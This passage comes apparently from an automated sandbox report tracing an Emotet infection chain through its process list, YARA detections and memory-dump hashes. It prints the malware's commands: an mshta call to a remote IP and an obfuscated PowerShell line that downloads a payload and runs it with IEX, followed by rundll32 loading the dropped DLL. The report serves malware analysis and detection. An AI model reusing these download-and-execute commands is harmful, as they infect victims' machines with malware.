                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:mshta http://91.240.118.172/gg/ff/fe.html
                                                                                                                                                          Imagebase:0x13fc80000
                                                                                                                                                          File size:13824 bytes
                                                                                                                                                          MD5 hash:95828D670CFD3B16EE188168E083C3C5
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high

                                                                                                                                                          Target ID:6
                                                                                                                                                          Start time:00:14:20
                                                                                                                                                          Start date:29/01/2022
                                                                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
                                                                                                                                                          Imagebase:0x13f740000
                                                                                                                                                          File size:473600 bytes
                                                                                                                                                          MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:.Net C# or VB.NET
                                                                                                                                                          Reputation:high

                                                                                                                                                          Target ID:8
                                                                                                                                                          Start time:00:14:54
                                                                                                                                                          Start date:29/01/2022
                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:"C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
                                                                                                                                                          Imagebase:0x4a530000
                                                                                                                                                          File size:345088 bytes
                                                                                                                                                          MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high

                                                                                                                                                          Target ID:9
                                                                                                                                                          Start time:00:14:54
                                                                                                                                                          Start date:29/01/2022
                                                                                                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
                                                                                                                                                          Imagebase:0x560000
                                                                                                                                                          File size:44544 bytes
                                                                                                                                                          MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Yara matches:
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000009.00000002.491615915.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          Reputation:high

                                                                                                                                                          Target ID:10
                                                                                                                                                          Start time:00:14:57
                                                                                                                                                          Start date:29/01/2022
                                                                                                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\JooSee.dll",DllRegisterServer
                                                                                                                                                          Imagebase:0x560000
                                                                                                                                                          File size:44544 bytes
                                                                                                                                                          MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Yara matches:
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.529589229.0000000002EA0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.528939071.0000000000340000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.528987636.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.529026211.00000000003C0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.529348749.0000000000960000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.529634937.0000000002F31000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.530108491.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.529436746.0000000002270000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.529463306.00000000022E1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.529946931.0000000003131000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.529386246.0000000000991000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.529511633.0000000002860000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.529254761.0000000000921000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.529784917.0000000003100000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.529563571.0000000002E71000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          Reputation:high

                                                                                                                                                          Target ID:11
                                                                                                                                                          Start time:00:15:12
                                                                                                                                                          Start date:29/01/2022
                                                                                                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Vkgzbyhfrraf\kkeql.uvv",ZIMElQfgS
                                                                                                                                                          Imagebase:0x560000
                                                                                                                                                          File size:44544 bytes
                                                                                                                                                          MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Yara matches:
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000B.00000002.532303320.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000B.00000002.531678798.0000000000200000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000B.00000002.531894160.0000000000271000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          Reputation:high

                                                                                                                                                          Target ID:12
                                                                                                                                                          Start time:00:15:16
                                                                                                                                                          Start date:29/01/2022
                                                                                                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Vkgzbyhfrraf\kkeql.uvv",DllRegisterServer
                                                                                                                                                          Imagebase:0x560000
                                                                                                                                                          File size:44544 bytes
                                                                                                                                                          MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Yara matches:
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.565617411.0000000000140000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.566094968.0000000002380000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.565770614.0000000000391000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.565871959.00000000004B0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.565688432.0000000000310000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.566246263.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.566399792.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.566320781.0000000002EE1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.565939675.0000000000700000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.565832376.00000000003F1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.566124768.00000000023B1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.566069057.00000000022E1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.565803219.00000000003C0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.565639567.0000000000181000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.565905688.0000000000521000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          Reputation:high

                                                                                                                                                          Target ID:14
                                                                                                                                                          Start time:00:15:29
                                                                                                                                                          Start date:29/01/2022
                                                                                                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Ycuydicj\gmnn.kvd",zrvqzkK
                                                                                                                                                          Imagebase:0x560000
                                                                                                                                                          File size:44544 bytes
                                                                                                                                                          MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Yara matches:
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.568518476.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.568211571.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.568292263.0000000000251000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          Reputation:high

                                                                                                                                                          Target ID:15
                                                                                                                                                          Start time:00:15:33
                                                                                                                                                          Start date:29/01/2022
                                                                                                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Ycuydicj\gmnn.kvd",DllRegisterServer
                                                                                                                                                          Imagebase:0x560000
                                                                                                                                                          File size:44544 bytes
                                                                                                                                                          MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Yara matches:
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.608492557.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.608452137.0000000000221000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.608835240.0000000000C61000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.608404160.00000000001A0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.608758914.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.609013404.0000000002E00000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.609038210.0000000002E31000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.608896622.0000000000CC1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.608866669.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.609334950.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.609062898.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.609120107.00000000030C1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.609258728.0000000003121000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.609178207.00000000030F0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.608543419.0000000000421000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          Reputation:high

                                                                                                                                                          Target ID:16
                                                                                                                                                          Start time:00:15:49
                                                                                                                                                          Start date:29/01/2022
                                                                                                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Glljiacvqavadds\bppnvnegw.hzh",vtyiOTNVC
                                                                                                                                                          Imagebase:0x560000
                                                                                                                                                          File size:44544 bytes
                                                                                                                                                          MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Yara matches:
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000010.00000002.611962960.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000010.00000002.611361259.0000000000370000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000010.00000002.611503359.00000000003A1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security

                                                                                                                                                          Target ID:17
                                                                                                                                                          Start time:00:15:53
                                                                                                                                                          Start date:29/01/2022
                                                                                                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Glljiacvqavadds\bppnvnegw.hzh",DllRegisterServer
                                                                                                                                                          Imagebase:0x560000
                                                                                                                                                          File size:44544 bytes
                                                                                                                                                          MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Yara matches:
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.667504927.00000000029F1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.667870525.0000000002DF1000.00000020.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.667560205.0000000002AB1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.667419702.00000000027D0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.667165192.0000000002290000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.667142438.0000000002261000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.667531977.0000000002A20000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.666923512.0000000000431000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.667706749.0000000002C41000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.667352422.0000000002491000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.666878998.0000000000400000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.667611615.0000000002B11000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.668008278.0000000002F91000.00000020.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.667590732.0000000002AE0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.669688860.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.667897137.0000000002E20000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.666799791.0000000000210000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.666842278.00000000002A1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.666953938.0000000000460000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.667829863.0000000002D20000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.667636789.0000000002B40000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000003.411031086.00000000031E1000.00000010.00000800.00020000.00000000.sdmp, Offset: 031E1000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_3_31e0000_mshta.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: x0E
                                                                                                                                                            • API String ID: 0-2085839638
                                                                                                                                                            • Opcode ID: 99aee6422d3f08525272ca22233b5d816d9eb4e1c5dc41a1d7d3929cea8755ee
                                                                                                                                                            • Instruction ID: ea1a5810ff67aa2bacbec9fa6811f23186a4b5717c7f76b85bacbbf6a1863647
                                                                                                                                                            • Opcode Fuzzy Hash: 99aee6422d3f08525272ca22233b5d816d9eb4e1c5dc41a1d7d3929cea8755ee
                                                                                                                                                            • Instruction Fuzzy Hash: A5D1F220618E584FCB5DEB2C8464621BBE1FB5D345B1984AEE48ECB292DB35CCD28395
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000003.411031086.00000000031E1000.00000010.00000800.00020000.00000000.sdmp, Offset: 031E0000, based on PE: false
                                                                                                                                                            • Associated: 00000004.00000003.410995408.00000000031E0000.00000010.00000800.00020000.00000000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_3_31e0000_mshta.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: x0E
                                                                                                                                                            • API String ID: 0-2085839638
                                                                                                                                                            • Opcode ID: 99aee6422d3f08525272ca22233b5d816d9eb4e1c5dc41a1d7d3929cea8755ee
                                                                                                                                                            • Instruction ID: ea1a5810ff67aa2bacbec9fa6811f23186a4b5717c7f76b85bacbbf6a1863647
                                                                                                                                                            • Opcode Fuzzy Hash: 99aee6422d3f08525272ca22233b5d816d9eb4e1c5dc41a1d7d3929cea8755ee
                                                                                                                                                            • Instruction Fuzzy Hash: A5D1F220618E584FCB5DEB2C8464621BBE1FB5D345B1984AEE48ECB292DB35CCD28395
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000003.410995408.00000000031E0000.00000010.00000800.00020000.00000000.sdmp, Offset: 031E3000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_3_31e0000_mshta.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: ee3897ea9c07d1d4adb7525daf5f0ffa21b7eb4689494ddfdd79d87bcccaa9bf
                                                                                                                                                            • Instruction ID: 66a6a1469f481cb4f5a91182a2f233d97174afe2281711c079623fa8db81b43d
                                                                                                                                                            • Opcode Fuzzy Hash: ee3897ea9c07d1d4adb7525daf5f0ffa21b7eb4689494ddfdd79d87bcccaa9bf
                                                                                                                                                            • Instruction Fuzzy Hash: A551D43471CE484FCB4DEB1C8859A21B7E1FB5D300B4988EEE49AC7292DB24CCD58796
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000003.410995408.00000000031E0000.00000010.00000800.00020000.00000000.sdmp, Offset: 031E0000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_3_31e0000_mshta.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: ee3897ea9c07d1d4adb7525daf5f0ffa21b7eb4689494ddfdd79d87bcccaa9bf
                                                                                                                                                            • Instruction ID: 66a6a1469f481cb4f5a91182a2f233d97174afe2281711c079623fa8db81b43d
                                                                                                                                                            • Opcode Fuzzy Hash: ee3897ea9c07d1d4adb7525daf5f0ffa21b7eb4689494ddfdd79d87bcccaa9bf
                                                                                                                                                            • Instruction Fuzzy Hash: A551D43471CE484FCB4DEB1C8859A21B7E1FB5D300B4988EEE49AC7292DB24CCD58796
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000003.411046942.0000000002AE0000.00000010.00000800.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_3_2ae0000_mshta.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: c84d4f47a0a1eb2755daa284573bcb9c99147f48edbeb189dee0e328c4e70d51
                                                                                                                                                            • Instruction ID: ef3c167d75bdc72172c1e1714a9e263b1efc5900ece626af053703c742426a0b
                                                                                                                                                            • Opcode Fuzzy Hash: c84d4f47a0a1eb2755daa284573bcb9c99147f48edbeb189dee0e328c4e70d51
                                                                                                                                                            • Instruction Fuzzy Hash:
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000003.411046942.0000000002AE0000.00000010.00000800.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_3_2ae0000_mshta.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
